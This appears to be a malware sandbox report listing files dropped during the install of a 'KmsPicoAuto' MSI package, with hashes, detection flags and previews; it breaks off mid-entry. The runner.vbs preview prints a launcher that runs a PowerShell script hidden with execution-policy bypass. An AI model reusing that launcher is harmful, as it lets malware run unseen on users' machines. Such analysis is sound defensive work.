C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qkcb2r3.gwc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyevjap4.4a4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfu1k0ni.udi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qj1ltikf.ua4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\putt.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1357367
Entropy (8bit):	7.966288323697462
Encrypted:	false
SSDEEP:	24576:C3+N6VbU/lx01RMCHCeMyipDIwATowO1vgc9HQHfw9hSTVbB4:v6bUn0XM4M3DIH8wGPMIcbW
MD5:	C6E90B3A98ECB4AB74A9AAF8155D1BC0
SHA1:	0A29A790AB82DDA61C5622586FBDBF46223B2989
SHA-256:	08BAE1BB8A881FF6A6A25F988D73DEF21B6D65D262960BC4706534F479B85B62
SHA-512:	A0DCF48ABD2DF0B1D9AFD33A49027047B53830F52BB0C16745FC953EAA9D38F15720496CBCF62EB17FCFA5A955CEADC16ABFE8817350B6F528312E3429DAA5AA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p...........@.................................@...........r_...................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...r_.......`..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\runner.vbs

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	169
Entropy (8bit):	5.194576996052681
Encrypted:	false
SSDEEP:	3:j+qAHmFEm8nBKjDQBgSSJJLNytGQqPJH0cVERSHmRPerbJSRE2J5xAI4FVXBv:j+q9Nq8ssnytGQO0cA1e0i23f4Fzv
MD5:	3A2B330C55D48C62F07664B8DB0F5D67
SHA1:	67B3D364B91D5A05B855170E64858D34E709E0F2
SHA-256:	4F88A0656CF9B9FC6CF81034FD42DDDE93E93AEC7F8457E984503784099626CD
SHA-512:	37BCCE19C5BECC6844288908E359D65D19B9B9242BE88520BE9F2BE127B67723789BEE8351E5E7E53E2CD1AE0099C1466A1657E2C142FFADD99F2BD9CF9D8182
Malicious:	false
Preview:	Set objShell = CreateObject("WScript.Shell") ..objShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""C:\Users\user~1\AppData\Local\Temp\2975.ps1""", 0, False ..

C:\Windows\Installer\53c168.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {01A028B0-C5F4-4809-A85C-BD25D6968735}, Number of Words: 2, Subject: KmsPicoAuto, Author: SoftPortable, Name of Creating Application: KmsPicoAuto, Template: ;1033, Comments: This installer database contains the logic and data required to install KmsPicoAuto., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:59:36 2024, Last Saved Time/Date: Mon Dec 16 18:59:36 2024, Last Printed: Mon Dec 16 18:59:36 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	2098688
Entropy (8bit):	6.63599620874043
Encrypted:	false
SSDEEP:	49152:l5MM8cU7Y4zGXknHeVdOEod5+1d7csiG/C:n4eYHeVdPod57
MD5:	0AD499852CAC6D4D76206E52BB6EFB16
SHA1:	A258C40EF83001CF7A41DBE9D2C05001F31FEA53
SHA-256:	1AB415530AE51853CFDD8FB1C8C0C88001D7D6CDF88AB2CB8C146C88C191DFD0
SHA-512:	5F75640514674C3EFCE1AFCD42573191405166880EF5BFB75516B1B9B8093FF71052FA16662D4F90B57D69CD28BA0E807219D1DFC58BC4999DD7DA30F1BD00E6
Malicious:	false
Preview:	......................>...................!...................................E.......a.......n.......................................C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R.......................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...>...5...6...7...8...9...D...<...m...=.......?...@...A...B...C...D...F.......G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\53c16a.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {01A028B0-C5F4-4809-A85C-BD25D6968735}, Number of Words: 2, Subject: KmsPicoAuto, Author: SoftPortable, Name of Creating Application: KmsPicoAuto, Template: ;1033, Comments: This installer database contains the logic and data required to install KmsPicoAuto., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:59:36 2024, Last Saved Time/Date: Mon Dec 16 18:59:36 2024, Last Printed: Mon Dec 16 18:59:36 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	2098688
Entropy (8bit):	6.63599620874043
Encrypted:	false
SSDEEP:	49152:l5MM8cU7Y4zGXknHeVdOEod5+1d7csiG/C:n4eYHeVdPod57
MD5:	0AD499852CAC6D4D76206E52BB6EFB16
SHA1:	A258C40EF83001CF7A41DBE9D2C05001F31FEA53
SHA-256:	1AB415530AE51853CFDD8FB1C8C0C88001D7D6CDF88AB2CB8C146C88C191DFD0
SHA-512:	5F75640514674C3EFCE1AFCD42573191405166880EF5BFB75516B1B9B8093FF71052FA16662D4F90B57D69CD28BA0E807219D1DFC58BC4999DD7DA30F1BD00E6
Malicious:	false
Preview:	......................>...................!...................................E.......a.......n.......................................C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R.......................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...>...5...6...7...8...9...D...<...m...=.......?...@...A...B...C...D...F.......G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSIC32D.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC39B.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC3DB.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC439.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	551515
Entropy (8bit):	6.436090648836394
Encrypted:	false
SSDEEP:	12288:wllcFz7UKez1EtOgU7Y4p4nle/DGWG5ap:wyz7UcU7Y4p4KGLA
MD5:	9E40BB3BDC7274A488C50BC35CE26111
SHA1:	2F7DB20D34F97DFDECF418225E698E43BA570C98
SHA-256:	7E931622B26599669FA3AA5B54BC99023682E77DAB1347EAF8C1A36FDA954F09
SHA-512:	B1B70D624A82934A8E85CCC4199B57ED09FCFB771EF91060DC40BDBACC0CB9F04F1B1C8CE64BDE9EA3773AA6581DE7EB6C9949FBBD2BF603BA0F6413EC7508B2
Malicious:	false
Preview:	...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{8549544C-E110-43F1-890F-41A5D528F5AA}..KmsPicoAuto..69633f.msi.@.....@.....@.....@........&.{01A028B0-C5F4-4809-A85C-BD25D6968735}.....@.....@.....@.....@.......@.....@.....@.......@......KmsPicoAuto......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{54726178-C674-486D-854B-BD331D9F11FB}0.C:\Program Files (x86)\SoftPortable\KmsPicoAuto\.@.......@.....@.....@......&.{DE68DB34-02FE-4559-86D1-5AB24521AE4D}-.02:\Software\SoftPortable\KmsPicoAuto\Version.@.......@.....@.....@......&.{1123B093-4171-4C7B-A7CC-3322A7CCA975}`.02:\SOFTWARE\Microsoft\Active Setup\Installed Components\{8549544C-E110-43F1-890F-41A5D528F5AA}\.@.......@.....@.....@......&.{05BD4742-3BAA-4DFE-8690-598F6240A7B3}h.02:\SOFTWARE\Microsoft\Active Setup\Installed Components\{8549544C-E110-43F1-890F-41A5D528F5AA}\StubPath.@.......@....

C:\Windows\Installer\MSIC534.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	548192
Entropy (8bit):	6.430181724276051
Encrypted:	false
SSDEEP:	12288:mllcFz7UKez1EtOgU7Y4p4nle/DGWG5ar:myz7UcU7Y4p4KGLo
MD5:	250DA78FACCE68224B24D0FFAD65CA8E
SHA1:	EA82B3EC612720DBF32206B4360CAE84430D13C8
SHA-256:	8BCD09F9C97EEDD41FFAB51B55894DAF605FBB67CAE77AC073D2CBAACB5E2581
SHA-512:	0BA6ECB45CF27E9E0997C0DF1F25846386799EFA6B198CE0E0A1A37BBA7463474E6F6C2D23CF2DF06EF21EBB722370268446F27B7E5087E7DF9D7B5DA4FDE4B2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m<..)].\)].\)].\Y.].].\Y.]/].\9.]#].\9.];].\9.]}].\Y.]:].\Y.](].\Y.]2].\)].\.].\a.]2].\a.T$].$]<\(].\a.](].\Rich)].\........................PE..d....,Xg.........."....).....D.................@..........................................`.................................................(........p..8.......D@... ..`=..............p.......................(.......@............ ..0............................text...<........................... ..`.rdata...... ......................@..@.data....G..........................@....pdata..D@.......B..................@..@.fptable.....`......................@....rsrc...8....p......................@..@.reloc..............................@..B................................................................................................................................................................................

C:\Windows\Installer\SourceHash{8549544C-E110-43F1-890F-41A5D528F5AA}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.162092690528894
Encrypted:	false
SSDEEP:	12:JSbX72FjTW6AGiLIlHVRpth/7777777777777777777777777vDHF07VntNeJpSz:JTQI5pQNEF
MD5:	88779ECB28C0DDF47633D59D5013A034
SHA1:	1741928D06E09AE3E0F66FC18776310F44F8ADDE
SHA-256:	4D7A1D66E1BAB7FE05DE253BBF20FEAA388DBCAEEB4E80188455B52BB4292037
SHA-512:	EEE9D1129D8BC6DFD3A8F51C75D5CF967A7C5649D4FA114551593F758D692ED7DA0C06DDF9DC398699F5634E440752B847B98D6A9F1863057FC5814AE63B7B11
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5795687191313985
Encrypted:	false
SSDEEP:	48:f8PhvuRc06WXJ0FT5EncXyrdmKSkdm6VAEkrCyMMwoRdmKSkdmGvf7Eh:ehv13FTocXGHeRCQnTTE
MD5:	0A3FEC442616986A0C30E2D43B762988
SHA1:	79146E636AAE9A25B07EB141B5DB4E40B32CA9A7
SHA-256:	735790F69B7FFA228AAA05DFEDE9BC483EA51AA5569B9D73AE92D1BE30D0E7B3
SHA-512:	D036B6F06477EBE2E5380C042E4A0451A1E3636C199AA13450CC364F5FF911528E25A51104D9717761D3B6FDEA04213C500826A298257877A34E23C8FF7FE76C
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.362972529751572
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpEm
MD5:	38B80BAA2DF94FE37B0E303714334A2E
SHA1:	D49CE11AF7E08E201048704898A2692C29B3995A
SHA-256:	1E85908AFE97A6979FE1988CABF11CD56A59BBF7B1D5806F479AF5E3C3095AA9
SHA-512:	24664928F7671B7497126B12B0D38F1267E57905EECFE06A7CEBF91B515D8279EA6771A43BB5274CF5DC137CE2D37C6DECB3C651A10951084F88282AAC0476D9
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Temp\~DF0032FC520835E5A6.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.0695284286089645
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKO0W8Vnt2WjqHs1QVky6lS:2F0i8n0itFzDHF07VntNDS
MD5:	E777CA8DE2F1C9E8466ACF502A670614
SHA1:	ABD6E43FFB96A1879BB45F370B8B56BB70A595F6
SHA-256:	17C45E56C69BC068B97DFBA6C857CE02E3CABBD9D8AB132DB7881E590B06E02A
SHA-512:	57F7CB3D346017FBFE9B141650ED95457E37347848E1EBDA377BDA104101322196D274B26008CEF612004EE03010FB84F230ABDAC31C6F63FEA18ADADC3F4A96
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF1A121D0FC4595D25.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2FA77517A3F2E262.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5795687191313985
Encrypted:	false
SSDEEP:	48:f8PhvuRc06WXJ0FT5EncXyrdmKSkdm6VAEkrCyMMwoRdmKSkdmGvf7Eh:ehv13FTocXGHeRCQnTTE
MD5:	0A3FEC442616986A0C30E2D43B762988
SHA1:	79146E636AAE9A25B07EB141B5DB4E40B32CA9A7
SHA-256:	735790F69B7FFA228AAA05DFEDE9BC483EA51AA5569B9D73AE92D1BE30D0E7B3
SHA-512:	D036B6F06477EBE2E5380C042E4A0451A1E3636C199AA13450CC364F5FF911528E25A51104D9717761D3B6FDEA04213C500826A298257877A34E23C8FF7FE76C
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF41228F260525FE78.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF417BA6168F490354.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2640959585077476
Encrypted:	false
SSDEEP:	48:cs3uSO+CFXJpT5EjncXyrdmKSkdm6VAEkrCyMMwoRdmKSkdmGvf7Eh:J34RTu7cXGHeRCQnTTE
MD5:	80B840DCA3CF19EB2AD028B85C3CA3D2
SHA1:	D912D2B8EFEDFFE7EC1BBDD1434B44DAC874B7E7
SHA-256:	BF81A07B8B63D6AFBCDAEA5D2E0E076C34204C64E95C8CB9B0414ED18F1EFED0
SHA-512:	A1F626DBF5548984C1EE1D21CB56255B9A8941A7782F43404AA6D37328C8D875C837504D73EA21332CA12C5417C69E0471FFBB6682F39DDB514E85FE0B3D4A1D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7C017C285802509A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2640959585077476
Encrypted:	false
SSDEEP:	48:cs3uSO+CFXJpT5EjncXyrdmKSkdm6VAEkrCyMMwoRdmKSkdmGvf7Eh:J34RTu7cXGHeRCQnTTE
MD5:	80B840DCA3CF19EB2AD028B85C3CA3D2
SHA1:	D912D2B8EFEDFFE7EC1BBDD1434B44DAC874B7E7
SHA-256:	BF81A07B8B63D6AFBCDAEA5D2E0E076C34204C64E95C8CB9B0414ED18F1EFED0
SHA-512:	A1F626DBF5548984C1EE1D21CB56255B9A8941A7782F43404AA6D37328C8D875C837504D73EA21332CA12C5417C69E0471FFBB6682F39DDB514E85FE0B3D4A1D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8E062C48F5D253C9.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF93017845C7A0B721.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9860C74005E15914.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.14233675341010343
Encrypted:	false
SSDEEP:	48:B7Eh3ERdmKSkdmLdmKSkdm6VAEkrCyMMwoKiycA:9EBKGHeRCQvyc
MD5:	9928A7687F34CE80136D639F1BBBC865
SHA1:	5A63E7E439BB8B3CF6EC0F55865F2CDA6C0F5D29
SHA-256:	CADE46A0984EADCD2C3B5C9DBBA296AF34B08B978FE847B44B8E3DEEDA9A5CCC
SHA-512:	8F35D9D164B668E8C08ACD2364F94CAE3F67FB84752024CFE2295BEBAA0C79F4D78510DA13045061F6A1B4C698AFBC66F3E7D85B6ECDBD0F41E99DAE93BE24C8
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9D319FC45CA3F4FC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
